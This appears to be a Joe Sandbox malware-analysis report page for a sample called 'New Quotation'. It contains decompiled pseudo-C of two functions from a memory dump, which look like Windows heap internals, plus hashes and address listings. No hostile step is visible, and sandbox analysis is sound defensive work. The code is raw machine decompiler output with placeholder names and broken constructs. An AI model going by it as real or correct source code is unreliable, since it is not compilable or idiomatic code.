                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 912330cc81f5aee9b4d8ee305a0ee1add1ab58af2f3495ae3185ee9fd2922875
                                                                                                                                                                                          • Instruction ID: 5307e3785c1bd71d03b070dc7fb3199e144d8afec661be54d0431fb1af929342
                                                                                                                                                                                          • Opcode Fuzzy Hash: 912330cc81f5aee9b4d8ee305a0ee1add1ab58af2f3495ae3185ee9fd2922875
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F1B476E00799CFCB45CF58C8806ADF7B1FF89764F15802AE845AB350D734A951CBA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E3800 Relevance: .3, Instructions: 349COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E1D7E3800(signed int __ecx, intOrPtr* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				short _v22;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _v48;
				void* __ebx;
				signed int _t183;
				char* _t189;
				signed int _t199;
				unsigned int _t200;
				signed int _t201;
				signed int _t206;
				intOrPtr _t218;
				intOrPtr _t219;
				signed int _t221;
				intOrPtr _t223;
				intOrPtr* _t234;
				signed int _t246;
				signed int _t252;
				signed int _t260;
				intOrPtr _t264;
				signed int _t269;
				signed int _t270;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t278;
				intOrPtr _t280;
				signed char _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t286;
				intOrPtr* _t288;
				signed int _t296;
				signed int _t298;
				signed int _t306;
				void* _t309;
				intOrPtr* _t310;
				signed int _t313;
				signed int _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t324;
				signed int _t327;
				signed int _t332;
				intOrPtr _t338;
				intOrPtr _t339;
				signed short _t341;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				intOrPtr* _t349;
				unsigned int _t354;
				signed int _t355;

				_t310 = __edx;
				_t269 = __ecx;
				_t275 =  *(__edx + 0x1b) & 0x000000ff;
				_v8 = __edx;
				_v20 = __ecx;
				_v44 =  *((intOrPtr*)(__edx + 0x10));
				_t338 = _a16;
				_t183 =  *(_t338 + 2) & 0x000000ff;
				if(_t275 != 0) {
					_t278 = 0xffffff98 + _t275 * 0x68 +  *((intOrPtr*)(__ecx + 0x5c4 + _t183 * 4));
				} else {
					_t278 =  *((intOrPtr*)(__ecx + 0x3c0 + _t183 * 4));
				}
				_t339 = _a8;
				_v16 = _t278;
				_t187 =  *(_t338 + 3) >> 0x00000001 & 0x00000003;
				if(( *(_t338 + 3) >> 0x00000001 & 0x00000003) != 0) {
					_t189 = E1D890EAD(_t269, _t310, _a4, _t187 & 0x000000ff, _t339, _a12, _a16);
					if(_t189 != 0) {
						goto L23;
					}
					_t310 = _v8;
					goto L3;
				} else {
					L3:
					_t280 = _a12;
					_t15 = _t339 + 8; // 0x9
					_t347 = _t15;
					_v36 = _t347;
					_t341 = 0;
					_v24 = _t347 >> 0x00000003 & 0x0000ffff;
					 *_a4 = _t310;
					_t313 = _a4;
					_t199 = ((_t280 - 0x00000020) / _t347 + 0x0000001f >> 0x00000003) + 0x00000020 & 0xfffffff8;
					_v40 = _t199;
					_t200 = _t199 + _t313;
					_t315 =  *0x1d8c6964; // 0xaf800bc0
					_v12 = _t315;
					if(_t200 + _t347 > _t313 + _t280) {
						L7:
						_t201 = _a4;
						_t44 = _t201 + 0x1c; // -33
						_t348 = _t44;
						 *(_t201 + 0x14) = _t341;
						 *((intOrPtr*)(_t201 + 0x18)) = _t348;
						_t47 = _t341 + 7; // 0x8
						E1D818F40(_t348, 0, _t47 >> 3);
						_t283 = _t341 & 0x0000001f;
						if(_t283 != 0) {
							 *(_t348 + (_t341 >> 5) * 4) =  *(_t348 + (_t341 >> 5) * 4) | (_t341 >> 0x00000005 | 0xffffffff) << _t283;
						}
						_t349 = _v8;
						_t316 = _v16;
						_t284 = _a4;
						 *((short*)(_t349 + 0x14)) = _v24;
						_t206 = _t341 & 0x0000ffff;
						 *(_t349 + 0x18) = _t206;
						_v32 = _t206;
						 *_t349 = _t316;
						 *((char*)(_t349 + 0x1a)) =  *((intOrPtr*)(_a16 + 2));
						 *((short*)(_t349 + 0x16)) = 0;
						 *(_t349 + 4) = _t284;
						 *((intOrPtr*)(_t349 + 8)) = 0;
						 *((intOrPtr*)(_t349 + 0xc)) = 0;
						_v22 = _v24 << 3;
						_v24 = _v40;
						 *(_t284 + 0x10) = _v12 ^ _v24 ^ _t269 ^ _t284;
						if( *((intOrPtr*)(_t316 + 0x54)) == 0) {
							_t285 =  *_t316;
							_t218 =  *((intOrPtr*)(_t285 + 0x14));
							if(_t218 < 0x20) {
								_t219 = _t218 + 4;
								goto L28;
							}
							goto L26;
						} else {
							 *((short*)(_t316 + 0x60)) =  *((short*)(_t316 + 0x60)) + 1;
							if( *((short*)(_t316 + 0x60)) > 0x1c) {
								_t285 =  *_t316;
								_t264 =  *((intOrPtr*)(_t285 + 0x14));
								if(_t264 == 0) {
									L26:
									 *((short*)(_t316 + 0x60)) = 0;
									goto L11;
								}
								_t219 = _t264 + 0xfffffffc;
								L28:
								 *((intOrPtr*)(_t285 + 0x14)) = _t219;
								goto L26;
							}
							L11:
							_t75 = _t316 + 0x50; // 0x51
							_t221 = _t75;
							_v12 = _t221;
							do {
								_t317 =  *_t221;
								_t286 =  *((intOrPtr*)(_t221 + 4));
								_v40 = _t317;
								_v36 = _t286;
								_t270 = _t317 + _t341;
								if(_t341 <= 0) {
								}
								_t318 = _t286;
								asm("lock cmpxchg8b [esi]");
								_t221 = _v12;
							} while (_t317 != _v40 || _t318 != _v36);
							_t288 = _v16;
							_t223 =  *_t288;
							 *((intOrPtr*)(_t223 + 0x10)) =  *((intOrPtr*)(_t223 + 0x10)) + 1;
							 *((intOrPtr*)(_t288 + 0x58)) =  *((intOrPtr*)(_t223 + 0x10));
							_v24 = ( *((E1D827AF9(_t288) & 0x0000ffff) + 0x1d8c4200) & 0x000000ff) % _t341 << 0x10;
							_v24 = _v32;
							asm("lock or [eax], ecx");
							_t322 = _v8;
							_t290 = _v24;
							 *((intOrPtr*)(_a4 + 0xc)) = 0xf0e0d0c0;
							 *((intOrPtr*)(_v8 + 0x1c)) = 1;
							asm("lock cmpxchg [esi], ecx");
							if(( *0x1d8c6638 & 0x00000002) != 0) {
								L20:
								_t234 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
								if(_t234 != 0) {
									if( *_t234 == 0) {
										goto L21;
									}
									_t189 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									L22:
									if( *_t189 != 0) {
										_t189 =  *[fs:0x30];
										if(( *(_t189 + 0x240) & 0x00000001) != 0) {
											_t189 = E1D88F68C(_t270,  *(_v20 + 0xc),  *((intOrPtr*)(_t322 + 4)),  *(_t322 + 0x14) & 0x0000ffff,  *(_t322 + 0x18) & 0x0000ffff,  *(_t322 + 0x1b) & 0x000000ff);
										}
									}
									L23:
									return _t189;
								}
								L21:
								_t189 = 0x7ffe0380;
								goto L22;
							}
							_t354 =  *( *[fs:0x18] + 0xfaa) & 0xff;
							_v24 = _t354;
							if( *0x1d8c6634 == 0) {
								_push(0);
								_push("true");
								_push(0x1d8c6634);
								_push(0x24);
								_push(0xffffffff);
								if(E1D812B20() >= 0) {
									goto L18;
								}
								_t344 =  *0x7ffe0004;
								_v44 = _t344;
								if(_t344 < 0x1000000) {
									_t270 = 0x7ffe0324;
									while(1) {
										_t298 =  *_t270;
										_t327 =  *0x7ffe0320;
										if(_t298 ==  *0x7ffe0328) {
											break;
										}
										asm("pause");
									}
									_t354 = _v24;
									_t290 = (_t298 << 8) * _v44;
									_t260 = ((_t327 * _v44 >> 0x00000020 << 0x00000020 | _t327 * _v44) >> 0x18) + (_t298 << 8) * _v44;
									L41:
									 *0x1d8c6634 = _t260;
									goto L18;
								}
								_t260 = ( *0x7ffe0320 * _t344 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t344) >> 0x18;
								goto L41;
							}
							L18:
							_t342 = E1D7CED00(_t290, 0x1d8c6634);
							_v40 = _t342;
							if( *0x1d8c6634 == 0) {
								_push(0);
								_push("true");
								_push(0x1d8c6634);
								_push(0x24);
								_push(0xffffffff);
								if(E1D812B20() >= 0) {
									goto L19;
								}
								_t270 =  *0x7ffe0004;
								_v44 = _t270;
								if(_t270 < 0x1000000) {
									_t270 = 0x7ffe0320;
									while(1) {
										_t296 =  *0x7ffe0324;
										_t324 =  *_t270;
										if(_t296 ==  *0x7ffe0328) {
											break;
										}
										asm("pause");
									}
									_t354 = _v24;
									_t342 = _v40;
									_t290 = (_t296 << 8) * _v44;
									_t252 = ((_t324 * _v44 >> 0x00000020 << 0x00000020 | _t324 * _v44) >> 0x18) + (_t296 << 8) * _v44;
									L49:
									 *0x1d8c6634 = _t252;
									goto L19;
								}
								_t252 = ( *0x7ffe0320 * _t270 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t270) >> 0x18;
								goto L49;
							}
							L19:
							_t246 = E1D7CED00(_t290, 0x1d8c6634);
							_t322 = _v8;
							_t355 = _t354 >> 3;
							 *(0x1d8c4200 + _t355 * 8) = _t246 & 0x7f7f7f7f;
							 *(0x1d8c4204 + _t355 * 8) = _t342 & 0x7f7f7f7f;
							goto L20;
						}
					} else {
						_v28 = _t347 << 0xd;
						_t273 = _t200 - _a4 << 0xd;
						do {
							_t332 = _t341 & 0x0000ffff;
							_t306 = _t200 >> 0x00000003 ^  *(_v20 + 0xc) ^ _t273 ^ _v12;
							_t341 = _t341 + 1;
							_t273 = _t273 + _v28;
							 *_t200 = _t306;
							_v32 = _t273;
							 *(_t200 + 4) = _t332 << 0x00000008 |  *(_t200 + 4) & 0xff0000ff;
							 *((char*)(_t200 + 7)) = 0x80;
							_t200 = _t200 + _t347;
							_t309 = _t347 + _t200;
							_t347 = _v36;
						} while (_t309 <= _a4 + _a12);
						_t269 = _v20;
						goto L7;
					}
				}
			}

































































                                                                                                                                                                                          0x1d7e3800
                                                                                                                                                                                          0x1d7e380d
                                                                                                                                                                                          0x1d7e380f
                                                                                                                                                                                          0x1d7e3813
                                                                                                                                                                                          0x1d7e3816
                                                                                                                                                                                          0x1d7e3819
                                                                                                                                                                                          0x1d7e381d
                                                                                                                                                                                          0x1d7e3820
                                                                                                                                                                                          0x1d7e3826
                                                                                                                                                                                          0x1d7e3ac4
                                                                                                                                                                                          0x1d7e382c
                                                                                                                                                                                          0x1d7e382c
                                                                                                                                                                                          0x1d7e382c
                                                                                                                                                                                          0x1d7e3836
                                                                                                                                                                                          0x1d7e383b
                                                                                                                                                                                          0x1d7e383e
                                                                                                                                                                                          0x1d7e3840
                                                                                                                                                                                          0x1d836867
                                                                                                                                                                                          0x1d83686e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d836874
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3846
                                                                                                                                                                                          0x1d7e3846
                                                                                                                                                                                          0x1d7e3846
                                                                                                                                                                                          0x1d7e3849
                                                                                                                                                                                          0x1d7e3849
                                                                                                                                                                                          0x1d7e384e
                                                                                                                                                                                          0x1d7e3854
                                                                                                                                                                                          0x1d7e3859
                                                                                                                                                                                          0x1d7e385f
                                                                                                                                                                                          0x1d7e3868
                                                                                                                                                                                          0x1d7e3874
                                                                                                                                                                                          0x1d7e3877
                                                                                                                                                                                          0x1d7e387a
                                                                                                                                                                                          0x1d7e3883
                                                                                                                                                                                          0x1d7e3889
                                                                                                                                                                                          0x1d7e388c
                                                                                                                                                                                          0x1d7e38e6
                                                                                                                                                                                          0x1d7e38e6
                                                                                                                                                                                          0x1d7e38e9
                                                                                                                                                                                          0x1d7e38e9
                                                                                                                                                                                          0x1d7e38ec
                                                                                                                                                                                          0x1d7e38ef
                                                                                                                                                                                          0x1d7e38f2
                                                                                                                                                                                          0x1d7e38fc
                                                                                                                                                                                          0x1d7e3906
                                                                                                                                                                                          0x1d7e3909
                                                                                                                                                                                          0x1d7e3918
                                                                                                                                                                                          0x1d7e3918
                                                                                                                                                                                          0x1d7e391a
                                                                                                                                                                                          0x1d7e3920
                                                                                                                                                                                          0x1d7e3923
                                                                                                                                                                                          0x1d7e3926
                                                                                                                                                                                          0x1d7e392a
                                                                                                                                                                                          0x1d7e392d
                                                                                                                                                                                          0x1d7e3931
                                                                                                                                                                                          0x1d7e3937
                                                                                                                                                                                          0x1d7e393c
                                                                                                                                                                                          0x1d7e3941
                                                                                                                                                                                          0x1d7e3945
                                                                                                                                                                                          0x1d7e3948
                                                                                                                                                                                          0x1d7e394b
                                                                                                                                                                                          0x1d7e3954
                                                                                                                                                                                          0x1d7e395b
                                                                                                                                                                                          0x1d7e3969
                                                                                                                                                                                          0x1d7e3971
                                                                                                                                                                                          0x1d7e3acb
                                                                                                                                                                                          0x1d7e3acd
                                                                                                                                                                                          0x1d7e3ad3
                                                                                                                                                                                          0x1d7e3ae0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3ae0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3977
                                                                                                                                                                                          0x1d7e3977
                                                                                                                                                                                          0x1d7e3980
                                                                                                                                                                                          0x1d7e3ae8
                                                                                                                                                                                          0x1d7e3aea
                                                                                                                                                                                          0x1d7e3aef
                                                                                                                                                                                          0x1d7e3ad5
                                                                                                                                                                                          0x1d7e3ad7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3ad7
                                                                                                                                                                                          0x1d7e3af1
                                                                                                                                                                                          0x1d7e3ae3
                                                                                                                                                                                          0x1d7e3ae3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3ae3
                                                                                                                                                                                          0x1d7e3986
                                                                                                                                                                                          0x1d7e3986
                                                                                                                                                                                          0x1d7e3986
                                                                                                                                                                                          0x1d7e3989
                                                                                                                                                                                          0x1d7e3990
                                                                                                                                                                                          0x1d7e3990
                                                                                                                                                                                          0x1d7e3992
                                                                                                                                                                                          0x1d7e3995
                                                                                                                                                                                          0x1d7e3998
                                                                                                                                                                                          0x1d7e399b
                                                                                                                                                                                          0x1d7e39a0
                                                                                                                                                                                          0x1d7e39a0
                                                                                                                                                                                          0x1d7e39ab
                                                                                                                                                                                          0x1d7e39b3
                                                                                                                                                                                          0x1d7e39bd
                                                                                                                                                                                          0x1d7e39bd
                                                                                                                                                                                          0x1d7e39c7
                                                                                                                                                                                          0x1d7e39ca
                                                                                                                                                                                          0x1d7e39cc
                                                                                                                                                                                          0x1d7e39d2
                                                                                                                                                                                          0x1d7e39f0
                                                                                                                                                                                          0x1d7e39f3
                                                                                                                                                                                          0x1d7e39fa
                                                                                                                                                                                          0x1d7e3a00
                                                                                                                                                                                          0x1d7e3a03
                                                                                                                                                                                          0x1d7e3a06
                                                                                                                                                                                          0x1d7e3a0f
                                                                                                                                                                                          0x1d7e3a19
                                                                                                                                                                                          0x1d7e3a24
                                                                                                                                                                                          0x1d7e3a8f
                                                                                                                                                                                          0x1d7e3a95
                                                                                                                                                                                          0x1d7e3a9a
                                                                                                                                                                                          0x1d836976
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d836985
                                                                                                                                                                                          0x1d7e3aa5
                                                                                                                                                                                          0x1d7e3aa8
                                                                                                                                                                                          0x1d83698f
                                                                                                                                                                                          0x1d83699c
                                                                                                                                                                                          0x1d8369bd
                                                                                                                                                                                          0x1d8369bd
                                                                                                                                                                                          0x1d83699c
                                                                                                                                                                                          0x1d7e3aae
                                                                                                                                                                                          0x1d7e3ab4
                                                                                                                                                                                          0x1d7e3ab4
                                                                                                                                                                                          0x1d7e3aa0
                                                                                                                                                                                          0x1d7e3aa0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3aa0
                                                                                                                                                                                          0x1d7e3a3a
                                                                                                                                                                                          0x1d7e3a3d
                                                                                                                                                                                          0x1d7e3a40
                                                                                                                                                                                          0x1d836884
                                                                                                                                                                                          0x1d836886
                                                                                                                                                                                          0x1d836888
                                                                                                                                                                                          0x1d83688d
                                                                                                                                                                                          0x1d83688f
                                                                                                                                                                                          0x1d836898
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83689e
                                                                                                                                                                                          0x1d8368a4
                                                                                                                                                                                          0x1d8368ad
                                                                                                                                                                                          0x1d8368be
                                                                                                                                                                                          0x1d8368cd
                                                                                                                                                                                          0x1d8368cd
                                                                                                                                                                                          0x1d8368cf
                                                                                                                                                                                          0x1d8368d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8368d7
                                                                                                                                                                                          0x1d8368d7
                                                                                                                                                                                          0x1d8368db
                                                                                                                                                                                          0x1d8368e6
                                                                                                                                                                                          0x1d8368ee
                                                                                                                                                                                          0x1d8368f0
                                                                                                                                                                                          0x1d8368f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8368f0
                                                                                                                                                                                          0x1d8368b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8368b8
                                                                                                                                                                                          0x1d7e3a46
                                                                                                                                                                                          0x1d7e3a57
                                                                                                                                                                                          0x1d7e3a59
                                                                                                                                                                                          0x1d7e3a5c
                                                                                                                                                                                          0x1d8368fa
                                                                                                                                                                                          0x1d8368fc
                                                                                                                                                                                          0x1d8368fe
                                                                                                                                                                                          0x1d836903
                                                                                                                                                                                          0x1d836905
                                                                                                                                                                                          0x1d83690e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d836914
                                                                                                                                                                                          0x1d83691a
                                                                                                                                                                                          0x1d836923
                                                                                                                                                                                          0x1d836939
                                                                                                                                                                                          0x1d836943
                                                                                                                                                                                          0x1d836943
                                                                                                                                                                                          0x1d836945
                                                                                                                                                                                          0x1d83694b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83694d
                                                                                                                                                                                          0x1d83694d
                                                                                                                                                                                          0x1d836951
                                                                                                                                                                                          0x1d836959
                                                                                                                                                                                          0x1d83695f
                                                                                                                                                                                          0x1d836967
                                                                                                                                                                                          0x1d836969
                                                                                                                                                                                          0x1d836969
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d836969
                                                                                                                                                                                          0x1d83692e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83692e
                                                                                                                                                                                          0x1d7e3a62
                                                                                                                                                                                          0x1d7e3a67
                                                                                                                                                                                          0x1d7e3a6c
                                                                                                                                                                                          0x1d7e3a7e
                                                                                                                                                                                          0x1d7e3a81
                                                                                                                                                                                          0x1d7e3a88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e3a88
                                                                                                                                                                                          0x1d7e388e
                                                                                                                                                                                          0x1d7e3898
                                                                                                                                                                                          0x1d7e389b
                                                                                                                                                                                          0x1d7e38a0
                                                                                                                                                                                          0x1d7e38ad
                                                                                                                                                                                          0x1d7e38b0
                                                                                                                                                                                          0x1d7e38b3
                                                                                                                                                                                          0x1d7e38b4
                                                                                                                                                                                          0x1d7e38b7
                                                                                                                                                                                          0x1d7e38c7
                                                                                                                                                                                          0x1d7e38ca
                                                                                                                                                                                          0x1d7e38d3
                                                                                                                                                                                          0x1d7e38d7
                                                                                                                                                                                          0x1d7e38d9
                                                                                                                                                                                          0x1d7e38dc
                                                                                                                                                                                          0x1d7e38df
                                                                                                                                                                                          0x1d7e38e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e38e3
                                                                                                                                                                                          0x1d7e388c

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 72ce09644da6ebf660a5608e46b4202aba919c3021fdcbdb6a773fc795bc8842
                                                                                                                                                                                          • Instruction ID: 40bb5d9b543c5f83b3d350f599aa9b0ecf383759c62402c375154743b7bcedbd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72ce09644da6ebf660a5608e46b4202aba919c3021fdcbdb6a773fc795bc8842
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E1B075A00246DFCB08CF59C881BAAB7F1FF48364F258169E955EB391D730E981CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D857EC3 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                          			E1D857EC3(void* __ecx, signed int __edx, intOrPtr _a4, char _a8) {
				char _v8;
				signed short* _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t125;
				signed short* _t180;
				intOrPtr _t194;
				intOrPtr* _t198;
				char _t200;
				char _t205;
				signed int _t207;
				signed int _t215;
				signed int _t218;
				signed int* _t221;
				void* _t225;
				signed int _t226;
				signed int _t230;
				signed short* _t249;
				signed short* _t254;
				char _t259;
				void* _t260;
				signed short* _t261;

				_t195 = __ecx;
				_t260 = __ecx;
				_v20 = __edx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0 ||  *((intOrPtr*)(__ecx + 0x30)) != 0 ||  *((intOrPtr*)(__ecx + 0x3c)) != 0 ||  *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t259 = _a8;
					if(_t259 != 0) {
						_t125 = E1D7E5D90(_t195,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t259 + 0x0000001f >> 0x00000003 & 0x1ffffffc);
						_v24 = _t125;
						if(_t125 != 0) {
							_t194 = _a4;
							_v32 = _t259;
							_v28 = _t125;
							if( *(_t260 + 0x38) == 0) {
								L25:
								_t235 =  *(_t260 + 0x30);
								_v16 = _t235;
								if(_t235 == 0) {
									L36:
									if( *(_t260 + 0x3c) == 0) {
										L40:
										if( *((intOrPtr*)(_t260 + 0x34)) == 0) {
											L44:
											if( *((intOrPtr*)(_t260 + 0x48)) == 0) {
												L48:
												_t261 = 0;
												L49:
												E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v24);
												goto L50;
											}
											if(E1D857DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x48)), 8,  &_v32) == 0) {
												L11:
												_t261 = 0xc0000001;
												goto L49;
											}
											_t198 =  *((intOrPtr*)(_t260 + 0x48));
											_t130 =  *_t198;
											if( *_t198 < 8) {
												goto L11;
											}
											_t117 = _t198 + 8; // 0x8
											if(E1D857DD0(_t194, _t259, _t117, _t130 + 0xfffffff8,  &_v32) == 0) {
												goto L11;
											}
											goto L48;
										}
										_t200 = 0x10;
										_v8 = _t200;
										if(E1D857DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x34)), _t200,  &_v32) == 0 || E1D804CF8( &_v8,  *( *((intOrPtr*)(_t260 + 0x34)) + 0xc) * 0x8c,  *( *((intOrPtr*)(_t260 + 0x34)) + 0xc) * 0x8c >> 0x20) < 0 || E1D857DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x34)) + 0x10, _v8,  &_v32) == 0) {
											goto L11;
										} else {
											goto L44;
										}
									}
									_push("true");
									_pop(_t205);
									_v8 = _t205;
									if(E1D857DD0(_t194, _t259,  *(_t260 + 0x3c), _t205,  &_v32) == 0) {
										goto L11;
									}
									_t207 = 0x24;
									if(E1D804CF8( &_v8,  *( *(_t260 + 0x3c)) * _t207,  *( *(_t260 + 0x3c)) * _t207 >> 0x20) < 0 || E1D857DD0(_t194, _t259,  &(( *(_t260 + 0x3c))[1]), _v8,  &_v32) == 0) {
										goto L11;
									} else {
										goto L40;
									}
								}
								if((_v20 & 0x00000100) == 0) {
									_v8 = 4;
									if(E1D857DD0(_t194, _t259, _t235, ?str?,  &_v32) == 0 || E1D804CF8( &_v8,  *( *(_t260 + 0x30)) * 0x11c,  *( *(_t260 + 0x30)) * 0x11c >> 0x20) < 0 || E1D857DD0(_t194, _t259,  &(( *(_t260 + 0x30))[1]), _v8,  &_v32) == 0) {
										goto L11;
									} else {
										goto L36;
									}
								}
								while(E1D857DD0(_t194, _t259, _t235, 2,  &_v32) != 0) {
									_t249 = _v16;
									if( *_t249 == 0) {
										L31:
										_t215 =  *_t249 & 0x0000ffff;
										_t235 = _t249 + _t215;
										_v16 = _t249 + _t215;
										if(_t215 != 0) {
											continue;
										}
										goto L36;
									}
									if(E1D857DD0(_t194, _t259,  &(_t249[1]), 0x12a,  &_v32) == 0) {
										goto L11;
									}
									_t249 = _v16;
									goto L31;
								}
								goto L11;
							}
							_v8 = 4;
							if(E1D857DD0(_t194, _t259,  *(_t260 + 0x38), ?str?,  &_v32) != 0) {
								_t218 = 0x40;
								if(E1D804CF8( &_v8,  *( *(_t260 + 0x38)) * _t218,  *( *(_t260 + 0x38)) * _t218 >> 0x20) < 0 || E1D857DD0(_t194, _t259,  &(( *(_t260 + 0x38))[1]), _v8,  &_v32) == 0) {
									goto L11;
								} else {
									_t221 =  *(_t260 + 0x38);
									_t180 = 0;
									_t254 = 0;
									_v16 = 0;
									if( *_t221 <= 0) {
										goto L25;
									}
									_v12 = 0;
									do {
										_t222 =  *(_t180 +  &(_t221[7]));
										if( *(_t180 +  &(_t221[7])) == 0) {
											L20:
											_t224 =  *(_t180 +  &(( *(_t260 + 0x38))[6]));
											if( *(_t180 +  &(( *(_t260 + 0x38))[6])) == 0) {
												goto L24;
											}
											_t226 = 0x40;
											if(E1D804CF8( &_v8, _t224 * _t226, _t224 * _t226 >> 0x20) < 0 || E1D857DD0(_t194, _t259,  *((intOrPtr*)(_v12 +  &(( *(_t260 + 0x38))[0xf]))), _v8,  &_v32) == 0) {
												goto L11;
											} else {
												_t180 = _v12;
												_t254 = _v16;
												goto L24;
											}
										}
										_t230 = 0x10;
										if(E1D804CF8( &_v8, _t222 * _t230, _t222 * _t230 >> 0x20) < 0 || E1D857DD0(_t194, _t259,  *((intOrPtr*)(_v12 +  &(( *(_t260 + 0x38))[0x10]))), _v8,  &_v32) == 0) {
											goto L11;
										} else {
											_t180 = _v12;
											_t254 = _v16;
											goto L20;
										}
										L24:
										_t225 = 0x40;
										_t180 = _t180 + _t225;
										_t254 =  &(_t254[0]);
										_t221 =  *(_t260 + 0x38);
										_v16 = _t254;
										_v12 = _t180;
									} while (_t254 <  *_t221);
									goto L25;
								}
							}
							goto L11;
						}
						return 0xc000009a;
					}
					_t261 = 0xc0000001;
					goto L50;
				} else {
					_t261 = 0;
					L50:
					return _t261;
				}
			}




























                                                                                                                                                                                          0x1d857ec3
                                                                                                                                                                                          0x1d857ecd
                                                                                                                                                                                          0x1d857ecf
                                                                                                                                                                                          0x1d857ed8
                                                                                                                                                                                          0x1d857ef0
                                                                                                                                                                                          0x1d857ef5
                                                                                                                                                                                          0x1d857f18
                                                                                                                                                                                          0x1d857f1d
                                                                                                                                                                                          0x1d857f22
                                                                                                                                                                                          0x1d857f32
                                                                                                                                                                                          0x1d857f35
                                                                                                                                                                                          0x1d857f38
                                                                                                                                                                                          0x1d857f3b
                                                                                                                                                                                          0x1d858058
                                                                                                                                                                                          0x1d858058
                                                                                                                                                                                          0x1d85805b
                                                                                                                                                                                          0x1d858060
                                                                                                                                                                                          0x1d85811d
                                                                                                                                                                                          0x1d858121
                                                                                                                                                                                          0x1d85817d
                                                                                                                                                                                          0x1d858181
                                                                                                                                                                                          0x1d8581e0
                                                                                                                                                                                          0x1d8581e4
                                                                                                                                                                                          0x1d85822b
                                                                                                                                                                                          0x1d85822b
                                                                                                                                                                                          0x1d85822d
                                                                                                                                                                                          0x1d85823c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d85823c
                                                                                                                                                                                          0x1d8581fa
                                                                                                                                                                                          0x1d857f5e
                                                                                                                                                                                          0x1d857f5e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d857f5e
